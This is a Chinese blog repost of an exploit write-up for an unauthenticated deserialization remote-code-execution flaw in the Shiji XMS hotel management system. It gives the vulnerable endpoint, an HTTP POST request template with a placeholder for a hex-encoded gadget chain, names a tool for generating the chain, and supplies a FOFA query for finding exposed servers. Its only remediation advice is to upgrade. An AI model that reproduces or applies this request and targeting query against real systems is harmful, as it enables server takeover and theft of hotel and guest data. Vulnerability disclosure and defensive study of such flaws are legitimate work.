西软云XMS 反序列化RCE

admin

102369
文章

87
评论

2023年12月30日17:53:55评论217 views字数 534阅读1分46秒阅读模式

漏洞详情

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四，五星级中高端酒店提供灵活、高度整合酒店业务，助力酒店智能转型升级。

西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞，未经身份认证的攻击者可利用此漏洞执行任意代码，获取服务器权限。

影响版本

全版本

西软云XMS 反序列化RCE

漏洞复现

payload

POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: close {{hexdec(cb18x的序列化链)}

可使用yakit直接生成序列化链

西软云XMS 反序列化RCE

fofa语法

app="shiji-西软云XMS"

修复建议

升级至安全版本

‍

原文始发于微信公众号（棉花糖网络安全圈）：西软云XMS 反序列化RCE

左青龙
微信扫一扫

右白虎
微信扫一扫

西软云XMS 反序列化RCE

使用 SeImpersonateToken 权限从 NT 服务到 SYSTEM 的反射 DLL

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

发表评论

在线咨询

微信